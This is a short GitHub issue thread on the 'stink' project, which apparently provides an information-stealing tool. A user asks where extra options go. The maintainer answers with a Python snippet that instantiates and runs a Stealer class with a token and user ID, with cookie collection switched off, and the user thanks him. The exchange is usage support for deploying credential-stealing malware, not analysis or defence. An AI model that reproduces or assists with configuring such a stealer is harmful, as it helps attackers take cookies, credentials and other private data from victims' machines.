### ISSUE TITLE
How to specify additional parameters?

### ISSUE THREAD

**Issue by n4stl3** [FallenAstaroth/stink#35]
what is the name of file where are additional parameters?

**Comment by FallenAstaroth** [comment]
> what is the name of file where are additional parameters?

Additional parameters are specified in the main file in which you call the Stealer class.

Example with disabling cookies collecting:
```python
from stink import Stealer

if __name__ == '__main__':
    Stealer(token="YOUR_TOKEN", user_id=YOUR_ID, cookies=False).run()
```

**Comment by n4stl3** [comment]
thx bro you are really kind
